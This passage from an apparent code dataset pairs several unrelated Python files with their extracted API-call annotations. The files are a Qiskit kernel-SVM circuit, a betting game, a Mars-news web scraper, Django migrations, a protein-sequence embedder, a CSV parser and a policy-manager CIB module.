(["('The module %s is already registered' % module.model.__name__)"], {}), "('The module %s is already registered' % module.model.__name__\n )\n", (4214, 4282), False, 'from django.contrib.admin.sites import AlreadyRegistered\n'), ((3730, 3815), 'django.contrib.admin.sites.AlreadyRegistered', 'AlreadyRegistered', (["('The report %s is already registered' % report_class.__name__)"], {}), "('The report %s is already registered' % report_class.__name__\n )\n", (3747, 3815), False, 'from django.contrib.admin.sites import AlreadyRegistered\n')] |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
import os
from qiskit import *
import numpy as np
import time
import itertools
import math
from random import *
def inner_prod_circuit_ML(entangler_map, coupling_map, initial_layout,n, x_vec1, x_vec2, name = 'circuit',\
meas_string = None, measurement = True):
# setup the circuit
q = QuantumRegister("q", n)
c = ClassicalRegister("c", n)
trial_circuit = QuantumCircuit(q, c)
# 0: Set the qubits in superposition
#write input state from sample distribution
for r in range(len(x_vec1)):
trial_circuit.h(q[r])
trial_circuit.u1(2*x_vec1[r], q[r])
# 1: Using entanglement,map the training data to a quantum feature map
for node in entangler_map:
for j in entangler_map[node]:
trial_circuit.cx(q[node], q[j])
trial_circuit.u1(2*(np.pi-x_vec1[node])*(np.pi-x_vec1[j]), q[j])
trial_circuit.cx(q[node], q[j])
# 2: inference the quantum classifier.
for r in range(len(x_vec1)):
trial_circuit.h(q[r])
trial_circuit.u1(2*x_vec1[r], q[r])
for node in entangler_map:
for j in entangler_map[node]:
trial_circuit.cx(q[node], q[j])
trial_circuit.u1(2*(np.pi-x_vec1[node])*(np.pi-x_vec1[j]), q[j])
for node in entangler_map:
for j in entangler_map[node]:
trial_circuit.u1(-2*(np.pi-x_vec2[node])*(np.pi-x_vec2[j]), q[j])
trial_circuit.cx(q[node], q[j])
for r in range(len(x_vec2)):
trial_circuit.u1(-2*x_vec2[r], q[r])
trial_circuit.h(q[r])
for node in entangler_map:
for j in entangler_map[node]:
trial_circuit.cx(q[node], q[j])
trial_circuit.u1(-2*(np.pi-x_vec2[node])*(np.pi-x_vec2[j]), q[j])
trial_circuit.cx(q[node], q[j])
for r in range(len(x_vec2)):
trial_circuit.u1(-2*x_vec2[r], q[r])
trial_circuit.h(q[r])
trial_circuit.measure(q,c)
return name, trial_circuit
# ***************
# ***************
# ***************
def matrify(vector, dimension):
mat = np.eye(dimension,dimension);
for kk in range(dimension):
a = int(dimension*kk - kk*(kk+1)/2)
b = int(dimension*(kk+1)-((kk+1)*(kk+2)/2+1))
mat[kk][kk+1:] = vector[a:b+1];
for i in range(dimension):
for j in range(i, dimension):
mat[j][i] = mat[i][j]
return mat
def eval_svm_function(entangler_map, coupling_map, initial_layout,n,m,svm,test_input,class_labels, \
backend,shots):
sample_shots = 0
c1 = 1
c2 = 1.5
c3 = 2
my_zero_string = ''
for nq in range(n):
my_zero_string += '0'
correct_povm = 0
number_of_classes = len(class_labels)
cost=0
total_cost = 0
std_cost = 0
### RUN CIRCUITS
circuits = []
cp = []
cm = []
sequencesp = []
sequencesm = []
first_array = test_input[class_labels[0]]
second_array = test_input[class_labels[1]]
total_test = np.concatenate([first_array,second_array])
circuits = []
ind = 0
for a in range(len(total_test)):
for b in range(len(svm)):
cp, sequencesp = inner_prod_circuit_ML(entangler_map, coupling_map, initial_layout,n,\
svm[b],total_test[a],'AB'+str(ind),None,True)
circuits.append(sequencesp)
ind +=1
job_sim = execute(circuits, backend ,shots=shots)
sim_result = job_sim.result()
my_data = {}
for index, circuit_to_get_result in enumerate(circuits):
my_data[str(index)]=sim_result.get_counts(circuit_to_get_result)
ind = iter(my_data.items())
counts = dict(itertools.islice(ind,len(my_data)))
K_total = []
for v in range(len(counts)):
K_total.append(counts[str(v)][my_zero_string]/shots)
return K_total
| [
"numpy.eye",
"numpy.concatenate"
] | [((2266, 2294), 'numpy.eye', 'np.eye', (['dimension', 'dimension'], {}), '(dimension, dimension)\n', (2272, 2294), True, 'import numpy as np\n'), ((3185, 3228), 'numpy.concatenate', 'np.concatenate', (['[first_array, second_array]'], {}), '([first_array, second_array])\n', (3199, 3228), True, 'import numpy as np\n')] |
import random
keepplaying = True
while keepplaying == True:
myInput = input("Bet your color Type: Red or Black:")
myInput = myInput.lower()
computerInput = random.randint(1,2)
if computerInput == 1:
computerSelection = "red"
elif computerInput == 2:
computerSelection = "black"
if computerSelection == myInput:
print("You win!")
else:
print("You lose")
user_input = input("Do you want to continue playing?")
if user_input == "no":
keepplaying = False
| [
"random.randint"
] | [((165, 185), 'random.randint', 'random.randint', (['(1)', '(2)'], {}), '(1, 2)\n', (179, 185), False, 'import random\n')] |
#########################################################################################
# Convert Jupyter notebook from Step 1 into Python script with a function called scrape
# that will execute all scraping code and return one Python dictionary containing
# all of the scraped data.
#########################################################################################
# Import Dependencies
from flask import Flask, jsonify
from bs4 import BeautifulSoup as bs
import requests
import pandas as pd
def scrape():
###################################################################################################################
# 1. Scrape the NASA Mars News Site and collect the latest News Title and Paragraph Text.
# 2. Find the image url for the current Featured Mars Image and assign the url to a variable, featured_image_url.
# 3. Visit the Mars Weather twitter page and scrape the latest Mars weather tweet from the page into mars_weather.
# 4. Visit the Mars Facts webpage and use Pandas to scrape the facts table and convert into an html_table_str.
# 5. Visit planetary.org to obtain high resolution images for each of Mar's hemispheres and make a dictionary.
###################################################################################################################
# 1. Scrape HTML from NASA website
url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'
response = requests.get(url)
parsed = bs(response.text, 'html.parser')
## Find and save titles and description into lists
news_title_list = []
news_p_list = []
for div in parsed.find_all('div', class_ = 'slide'):
news_title = div.find('div', class_ = 'content_title').text.strip()
news_p = div.find('div', class_ = 'rollover_description_inner').text.strip()
news_title_list.append(news_title)
news_p_list.append(news_p)
# 2. Scrape HTML from JPL Mars Space Images
jplmars_url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
response = requests.get(jplmars_url)
parsed_jplmars = bs(response.text, 'html.parser')
## Find and save featured image url
### (Splinter's Selenium's Geckodriver was denied on MacOS due to my security settings so I won't be using Splinter)
for a in parsed_jplmars.find_all('a', class_ = 'button fancybox'):
featured_image_url = 'https://www.jpl.nasa.gov' + a.get('data-fancybox-href')
# 3. Scrape HTML from Mars Weather's Twitter Page
twitter_url = 'https://twitter.com/marswxreport?lang=en'
response = requests.get(twitter_url)
parsed_twitter = bs(response.text, 'html.parser')
## Scrape the latest Mars weather tweet from the page
for p in parsed_twitter.find('p', class_ ="TweetTextSize TweetTextSize--normal js-tweet-text tweet-text"):
mars_weather = p
# 4. Scrape table from Mars Facts using Pandas
spacefacts_url = 'https://space-facts.com/mars/'
tables = pd.read_html(spacefacts_url)
df = tables[0]
## Use Pandas to convert the data to a HTML table string
html_table_str = df.to_html()
# 5. Scrape HTML from planetary.org
hemispheres_url = 'http://www.planetary.org/blogs/guest-blogs/bill-dunford/20140203-the-faces-of-mars.html'
response = requests.get(hemispheres_url)
parsed_hemisphere = bs(response.text, 'html.parser')
hemisphere_image_urls = []
# Get img urls and save into a dictionary then append to a list.
for img in parsed_hemisphere.find_all('img', class_ = 'img840'):
hemisphere_title = img.get('alt')
hemisphere_url = img.get('src')
new_dict = {
'title': hemisphere_title,
'img_url': hemisphere_url
}
hemisphere_image_urls.append(new_dict)
# Create a dictionary with all the scraped data to return
dict_of_scraped = {
"news_title_list": news_title_list,
"news_p_list": news_p_list,
"featured_image_url": featured_image_url,
"mars_weather": mars_weather,
"html_table_str": html_table_str,
"hemisphere_image_urls": hemisphere_image_urls
}
return dict_of_scraped | [
"bs4.BeautifulSoup",
"pandas.read_html",
"requests.get"
] | [((1549, 1566), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (1561, 1566), False, 'import requests\n'), ((1580, 1612), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (1582, 1612), True, 'from bs4 import BeautifulSoup as bs\n'), ((2160, 2185), 'requests.get', 'requests.get', (['jplmars_url'], {}), '(jplmars_url)\n', (2172, 2185), False, 'import requests\n'), ((2207, 2239), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (2209, 2239), True, 'from bs4 import BeautifulSoup as bs\n'), ((2690, 2715), 'requests.get', 'requests.get', (['twitter_url'], {}), '(twitter_url)\n', (2702, 2715), False, 'import requests\n'), ((2737, 2769), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (2739, 2769), True, 'from bs4 import BeautifulSoup as bs\n'), ((3083, 3111), 'pandas.read_html', 'pd.read_html', (['spacefacts_url'], {}), '(spacefacts_url)\n', (3095, 3111), True, 'import pandas as pd\n'), ((3395, 3424), 'requests.get', 'requests.get', (['hemispheres_url'], {}), '(hemispheres_url)\n', (3407, 3424), False, 'import requests\n'), ((3449, 3481), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (3451, 3481), True, 'from bs4 import BeautifulSoup as bs\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-08 16:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('medicos', '0001_initial'),
('pacientes', '0005_auto_20171202_1917'),
]
operations = [
migrations.AddField(
model_name='paciente',
name='medico',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='medicos.Medico'),
),
]
| [
"django.db.models.ForeignKey"
] | [((473, 571), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.PROTECT', 'to': '"""medicos.Medico"""'}), "(null=True, on_delete=django.db.models.deletion.PROTECT,\n to='medicos.Medico')\n", (490, 571), False, 'from django.db import migrations, models\n')] |
__all__ = ["SequenceEmbedder"]
from os import PathLike
from pathlib import Path
from typing import List, Tuple
import esm
import torch
from sklearn.decomposition import PCA
from torch.utils.data import DataLoader
from src.path import ROOT_PATH
PCA_PATH = Path(ROOT_PATH, "data", "processed", "pca_train.pt")
class SequenceEmbedder:
def __init__(self, max_sequence_len: int = 30, embedding_size: int = 60) -> None:
if not PCA_PATH.exists():
raise FileNotFoundError("Trained PCA does not exist!")
self.trained_pca: PCA = torch.load(PCA_PATH)
self.model, self.alphabet = esm.pretrained.load_model_and_alphabet(
"esm1_t6_43M_UR50S"
)
self.model.eval()
self.repr_layer = self.model.num_layers % (self.model.num_layers + 1)
self.max_sequence_len = max_sequence_len
self.embedding_size = embedding_size
@torch.no_grad()
def embed(self, fasta_file: PathLike) -> Tuple[List[str], torch.Tensor]:
"""Embeds the sequences listed in the input file, returning a list of strings and a batch of N×L×E dimensions,
where N is the number of sequences in FASTA, L is the maximum sequence length, and E is the embedding size.
Parameters
----------
fasta_file : os.PathLike
Returns
-------
Tuple[List[str], torch.Tensor]
"""
# Generate dataset from FASTA file
dataset = esm.FastaBatchedDataset.from_file(fasta_file)
batches = dataset.get_batch_indices(toks_per_batch=4096, extra_toks_per_seq=1)
dataloader = DataLoader(
dataset,
collate_fn=self.alphabet.get_batch_converter(),
batch_sampler=batches,
)
x = {}
for labels, sequences, toks in dataloader:
# Truncate
toks = toks[:, :1022]
# Generate representations
out = self.model(toks, repr_layers=[self.repr_layer], return_contacts=False)
representations = out["representations"][self.repr_layer]
for i, sequence in enumerate(sequences):
sequence_len = len(sequence)
representation = representations[i, 1 : sequence_len + 1]
embedding = torch.zeros((self.max_sequence_len, self.embedding_size))
embedding[:sequence_len, :] = torch.Tensor(
self.trained_pca.transform(representation)
)
x[sequence] = embedding
batch = torch.stack(tuple(x.values()))
return list(x.keys()), batch
| [
"esm.FastaBatchedDataset.from_file",
"pathlib.Path",
"torch.load",
"esm.pretrained.load_model_and_alphabet",
"torch.no_grad",
"torch.zeros"
] | [((259, 311), 'pathlib.Path', 'Path', (['ROOT_PATH', '"""data"""', '"""processed"""', '"""pca_train.pt"""'], {}), "(ROOT_PATH, 'data', 'processed', 'pca_train.pt')\n", (263, 311), False, 'from pathlib import Path\n'), ((900, 915), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (913, 915), False, 'import torch\n'), ((557, 577), 'torch.load', 'torch.load', (['PCA_PATH'], {}), '(PCA_PATH)\n', (567, 577), False, 'import torch\n'), ((614, 673), 'esm.pretrained.load_model_and_alphabet', 'esm.pretrained.load_model_and_alphabet', (['"""esm1_t6_43M_UR50S"""'], {}), "('esm1_t6_43M_UR50S')\n", (652, 673), False, 'import esm\n'), ((1445, 1490), 'esm.FastaBatchedDataset.from_file', 'esm.FastaBatchedDataset.from_file', (['fasta_file'], {}), '(fasta_file)\n', (1478, 1490), False, 'import esm\n'), ((2258, 2315), 'torch.zeros', 'torch.zeros', (['(self.max_sequence_len, self.embedding_size)'], {}), '((self.max_sequence_len, self.embedding_size))\n', (2269, 2315), False, 'import torch\n')] |
import sys
def solution(n, r, c):
if n == 0:
return 0
return 2 * (r % 2) + (c % 2) + 4 * solution(n - 1, int(r / 2), int(c / 2))
if __name__ == "__main__":
n, r, c = map(int, sys.stdin.readline().split())
print(solution(n, r, c))
| [
"sys.stdin.readline"
] | [((199, 219), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (217, 219), False, 'import sys\n')] |
import csv
import six
DAYS = ('mon', 'tue', 'wed', 'thu', 'fri')
SQUARE_DAYS = ('mon', 'tue', 'wed')
DOUBLE_DAYS = ('thu', 'fri')
DAY_TO_NUMBER = {day: i for i, day in enumerate(DAYS)}
NUMBER_TO_DAY = {i: day for i, day in enumerate(DAYS)}
def parse_week(filename):
"""
We open an input filename, parse it and return its data.
"""
week_data = {}
with open(filename) as csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
week_data = parse_row(row)
return [week_data[day] for day in DAYS if week_data.get(day) is not None]
def parse_row(row):
"""
Parse a row from an input CSV file and return its data.
The expected input format is a dictionary of column_names -> column_values.
"""
week_data = {}
description = None
for column, value in six.iteritems(row):
if column == 'description':
description = value
elif column in DAYS:
week_data[column] = {'day': column, 'value': int(value)}
elif column is not None and '-' in column:
start, end = column.split('-')
start, end = DAY_TO_NUMBER.get(start), DAY_TO_NUMBER.get(end)
if start is not None and end is not None:
for number in six.moves.xrange(start, end + 1):
day = NUMBER_TO_DAY[number]
week_data[day] = {'day': day, 'value': int(value)}
populate_extra_data(week_data, description)
return week_data
def populate_extra_data(week_data, description):
"""
Once the daily data has been collected, we need to append the extra value
and the description to every day.
"""
for day, day_week_data in six.iteritems(week_data):
value = day_week_data['value']
if day in SQUARE_DAYS:
extra_value = value ** 2
day_week_data['square'] = extra_value
elif day in DOUBLE_DAYS:
extra_value = value * 2
day_week_data['double'] = extra_value
day_week_data['description'] = '{} {}'.format(description, extra_value)
| [
"six.moves.xrange",
"six.iteritems",
"csv.DictReader"
] | [((840, 858), 'six.iteritems', 'six.iteritems', (['row'], {}), '(row)\n', (853, 858), False, 'import six\n'), ((1716, 1740), 'six.iteritems', 'six.iteritems', (['week_data'], {}), '(week_data)\n', (1729, 1740), False, 'import six\n'), ((423, 447), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (437, 447), False, 'import csv\n'), ((1279, 1311), 'six.moves.xrange', 'six.moves.xrange', (['start', '(end + 1)'], {}), '(start, end + 1)\n', (1295, 1311), False, 'import six\n')] |
# Generated by Django 3.1.13 on 2021-11-28 12:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='PeriodoMenstrual',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dias_menstruacion', models.CharField(blank=True, max_length=2, null=True)),
('fecha_ultima_menstruacion', models.DateField(blank=True, null=True)),
('sintomas_antes', models.CharField(blank=True, max_length=100, null=True)),
('sintomas_despues', models.CharField(blank=True, max_length=100, null=True)),
('embarazo', models.BooleanField(default=False)),
('anticonceptivos', models.BooleanField(default=False)),
('anticonceptivos_cuales', models.CharField(blank=True, max_length=100, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='nutri_paciente_periodo_mestrual', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='IndicadorBioquimico',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateField()),
('colesterol', models.CharField(blank=True, max_length=10, null=True)),
('trigliceridos', models.CharField(blank=True, max_length=10, null=True)),
('hdl', models.CharField(blank=True, max_length=10, null=True)),
('ldl', models.CharField(blank=True, max_length=10, null=True)),
('glucosa_ayunas', models.CharField(blank=True, max_length=10, null=True)),
('hemoglobina', models.CharField(blank=True, max_length=10, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nutri_paciente_indicadores_bioquimicos', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Cita',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField()),
('diaganotico', models.TextField()),
('completada', models.BooleanField(default=False)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nutri_paciente_cita', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"django.db.models.OneToOneField",
"django.db.models.DateField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.migrations.swappable_dependency",
"django.db.models.CharField"
] | [((248, 305), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (279, 305), False, 'from django.db import migrations, models\n'), ((446, 539), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (462, 539), False, 'from django.db import migrations, models\n'), ((576, 629), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(2)', 'null': '(True)'}), '(blank=True, max_length=2, null=True)\n', (592, 629), False, 'from django.db import migrations, models\n'), ((678, 717), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (694, 717), False, 'from django.db import migrations, models\n'), ((755, 810), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (771, 810), False, 'from django.db import migrations, models\n'), ((850, 905), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (866, 905), False, 'from django.db import migrations, models\n'), ((937, 971), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (956, 971), False, 'from django.db import migrations, models\n'), ((1010, 1044), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1029, 1044), False, 'from django.db import migrations, models\n'), ((1090, 1145), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (1106, 1145), False, 'from django.db import migrations, models\n'), ((1173, 1324), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""nutri_paciente_periodo_mestrual"""', 'to': 'settings.AUTH_USER_MODEL'}), "(on_delete=django.db.models.deletion.CASCADE,\n related_name='nutri_paciente_periodo_mestrual', to=settings.AUTH_USER_MODEL\n )\n", (1193, 1324), False, 'from django.db import migrations, models\n'), ((1460, 1553), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1476, 1553), False, 'from django.db import migrations, models\n'), ((1578, 1596), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (1594, 1596), False, 'from django.db import migrations, models\n'), ((1630, 1684), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1646, 1684), False, 'from django.db import migrations, models\n'), ((1721, 1775), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1737, 1775), False, 'from django.db import migrations, models\n'), ((1802, 1856), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1818, 1856), False, 'from django.db import migrations, models\n'), ((1883, 1937), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1899, 1937), False, 'from django.db import migrations, models\n'), ((1975, 2029), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1991, 2029), False, 'from django.db import migrations, models\n'), ((2064, 2118), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (2080, 2118), False, 'from django.db import migrations, models\n'), ((2146, 2297), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""nutri_paciente_indicadores_bioquimicos"""', 'to': 'settings.AUTH_USER_MODEL'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='nutri_paciente_indicadores_bioquimicos', to=settings.AUTH_USER_MODEL)\n", (2163, 2297), False, 'from django.db import migrations, models\n'), ((2422, 2515), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2438, 2515), False, 'from django.db import migrations, models\n'), ((2540, 2562), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (2560, 2562), False, 'from django.db import migrations, models\n'), ((2597, 2615), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2613, 2615), False, 'from django.db import migrations, models\n'), ((2649, 2683), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2668, 2683), False, 'from django.db import migrations, models\n'), ((2711, 2843), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""nutri_paciente_cita"""', 'to': 'settings.AUTH_USER_MODEL'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='nutri_paciente_cita', to=settings.AUTH_USER_MODEL)\n", (2728, 2843), False, 'from django.db import migrations, models\n')] |
import bisect
import copy
import hashlib
import itertools
import json
import operator
import time
from collections import ChainMap
import pmdefaults as PM
from pmdefaults import *
from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator
CIB_EXPIRED = 2
class CIBEntryError(Exception):
pass
def load_json(filename):
"""
Read CIB node from JSON file
"""
cib_file = open(filename, 'r')
try:
j = json.load(cib_file)
except json.decoder.JSONDecodeError as e:
logging.error("Could not parse CIB file " + filename)
print(e)
return
return j
class CIBNode(object):
cib = None
def __init__(self, node_dict=None):
if node_dict is None:
node_dict = dict()
if not isinstance(node_dict, dict):
raise CIBEntryError("invalid CIB object")
self.root = node_dict.get('root', False)
# otherwise chain matched CIBs
self.link = node_dict.get('link', False)
self.priority = node_dict.get('priority', 0)
# TTL for the CIB node: the node is considered invalid after the time specified
self.expire = node_dict.get('expire', None) or node_dict.get('expires', None) # FIXME expires is deprecated
self.filename = node_dict.get('filename', None)
self.description = node_dict.get('description', '')
# convert to PropertyMultiArray with NEATProperties
properties = node_dict.get('properties', [])
if not isinstance(properties, list):
# properties should be in a list. The list elements are expanded when generating the CIB rows.
properties = [properties]
self.properties = PropertyMultiArray()
for p in properties:
if isinstance(p, list):
self.properties.add([PropertyArray.from_dict(ps) for ps in p])
else:
self.properties.add(PropertyArray.from_dict(p))
self.match = []
# FIXME better error handling if match undefined
for l in node_dict.get('match', []):
# convert to NEATProperties
self.match.append(PropertyArray.from_dict(l))
self.linked = set()
if self.link and not self.match:
logging.warning('link attribute set but no match field!')
self.uid = node_dict.get('uid')
if self.uid is None:
self.uid = self._gen_uid()
def dict(self):
d = {}
for attr in ['uid', 'root', 'link', 'priority', 'filename', 'description', 'expire', ]:
try:
d[attr] = getattr(self, attr)
except AttributeError:
logging.debug("CIB node doesn't contain attribute %s" % attr)
if self.match:
d['match'] = []
for m in self.match:
d['match'].append(m.dict())
d['properties'] = self.properties.list()
return d
@property
def expire(self):
return self._expire
@expire.setter
def expire(self, value):
if value is None:
self._expire = time.time() + CIB_DEFAULT_TIMEOUT
return
value = float(value)
if value == -1:
# does not expire
self._expire = value
elif time.time() > value:
raise CIBEntryError('ignoring expired CIB node', CIB_EXPIRED)
else:
self._expire = value
def _gen_uid(self):
# FIXME generate persistent UIDs
d = self.dict()
for k in ['expire', 'filename', 'uid', ]:
try:
del d[k]
except KeyError:
pass
s = json.dumps(d, indent=0, sort_keys=True)
return hashlib.md5(s.encode('utf-8')).hexdigest()
def json(self, indent=4):
return json.dumps(self.dict(), indent=indent, sort_keys=True)
def resolve_paths(self, path=None):
"""recursively find all paths from this CIBNode to all other matched CIBnodes in the CIB graph"""
if path is None:
path = []
# insert own index based on CIB node priority to resolve overlapping properties later
# FIXME priorities no longer work
pos = bisect.bisect([self.cib[uid].priority for uid in path], self.priority)
path.insert(pos, self.uid)
# no more links to check
if not (self.linked - set(path)):
return [path]
new_paths = []
for uid in self.linked:
if uid in path:
continue
new_paths.extend(self.cib[uid].resolve_links(path.copy()))
return new_paths
def match_entry(self, entry):
for match_properties in self.match:
if match_properties <= entry:
return True
return False
def expand(self):
for p in self.properties.expand():
yield p
def update_links_from_match(self):
"""
Look at the list elements in self.match and try to match all of its properties to another CIB entry. Generates a
list containing the UIDs of the matched rows. The list is stored in self.linked.
"""
for match_properties in self.match:
for node in self.cib.nodes.values():
if node.uid == self.uid: continue # ??
for p in node.expand():
# Check if the properties in the match list are a full subset of some CIB properties.
# Also include the CIB uid as a property while matching
if match_properties <= set(p.values()) | {NEATProperty(('uid', node.uid))}:
self.linked.add(node.uid)
def resolve_graph(self, path=None):
"""new try """
if path is None:
path = []
path.append(self.uid)
remaining = set(self.cib.graph.get(self.uid, [])) - set(path)
if len(remaining) == 0:
return [path]
new_paths = []
for u in remaining:
paths = self.cib.nodes[u].resolve_graph(path.copy())
new_paths.extend(paths)
return new_paths
def resolve_links(self, path=None):
"""find paths from current CIB to all linked CIBS """
if path is None:
path = []
# insert own index based on CIB node priority to resolve overlapping properties later
pos = bisect.bisect([self.cib[uid].priority for uid in path], self.priority)
path.insert(pos, self.uid)
# no more links to check
if not (self.linked - set(path)):
return [path]
new_paths = []
for uid in self.linked:
if uid in path:
continue
new_paths.extend(self.cib[uid].resolve_links(path.copy()))
return new_paths
def expand_rows(self, apply_extended=True):
"""Generate CIB rows by expanding all CIBs pointing to current CIB """
paths = self.resolve_graph()
# for storing expanded rows
rows = []
for path in paths:
expanded_properties = (self.cib[uid].expand() for uid in path)
for pas in itertools.product(*expanded_properties):
chain = ChainMap(*pas)
# For debugging purposes, add the path list to the chain.
# Store as string to preserve path order (NEAT properties are not ordered).
dbg_path = '<<'.join(uid for uid in path)
# insert at position 0 to override any existing entries
# chain.maps.insert(0, PropertyArray(NEATProperty(('cib_uids', dbg_path))))
# convert back to normal PropertyArrays
row = PropertyArray(*(p for p in chain.values()))
row.meta['cib_uids'] = dbg_path
rows.append(row)
if not apply_extended:
return rows
if not self.cib.extenders:
# no extender CIB nodes loaded
return rows
# TODO optimize
extended_rows = rows.copy()
for entry in rows:
# TODO take priorities into account
# iterate extender cib_nodes
for uid, xs in self.cib.extenders.items():
for pa in xs.expand():
if xs.match_entry(entry):
entry_copy = copy.deepcopy(entry)
chain = ChainMap(pa, entry_copy)
new_pa = PropertyArray(*(p for p in chain.values()))
try:
del new_pa['uid']
except KeyError:
pass
extended_rows.append(new_pa)
return extended_rows
def __repr__(self):
s = str(self.properties)
if self.linked:
s += " linked@%s" % self.linked
return s
class CIB(object):
"""
Internal representation of the CIB for testing
"""
cib_dir = PM.CIB_DIR
CIB_EXTENSIONS = ('.cib', '.local', '.connection', '.remote', '.slim')
def __init__(self, cib_dir=None):
# dictionary containing all loaded CIB nodes, keyed by their uid
self.nodes = {}
# track CIB files
self.files = dict()
CIBNode.cib = self
self.graph = {}
if cib_dir:
self.cib_dir = cib_dir
self.reload_files()
def __getitem__(self, uid):
return self.nodes[uid]
def items(self):
return self.nodes.items()
def keys(self):
return self.nodes.keys()
def values(self):
return self.nodes.values()
@property
def roots(self):
return {k: v for k, v in self.nodes.items() if v.root is True}
@property
def extenders(self):
return {k: v for k, v in self.nodes.items() if not v.link}
@property
def rows(self):
"""
Returns a generator containing all expanded root CIB nodes
"""
for uid, r in self.roots.items():
# expand all cib nodes
for entry in r.expand_rows():
entry.cib_node = uid
yield entry
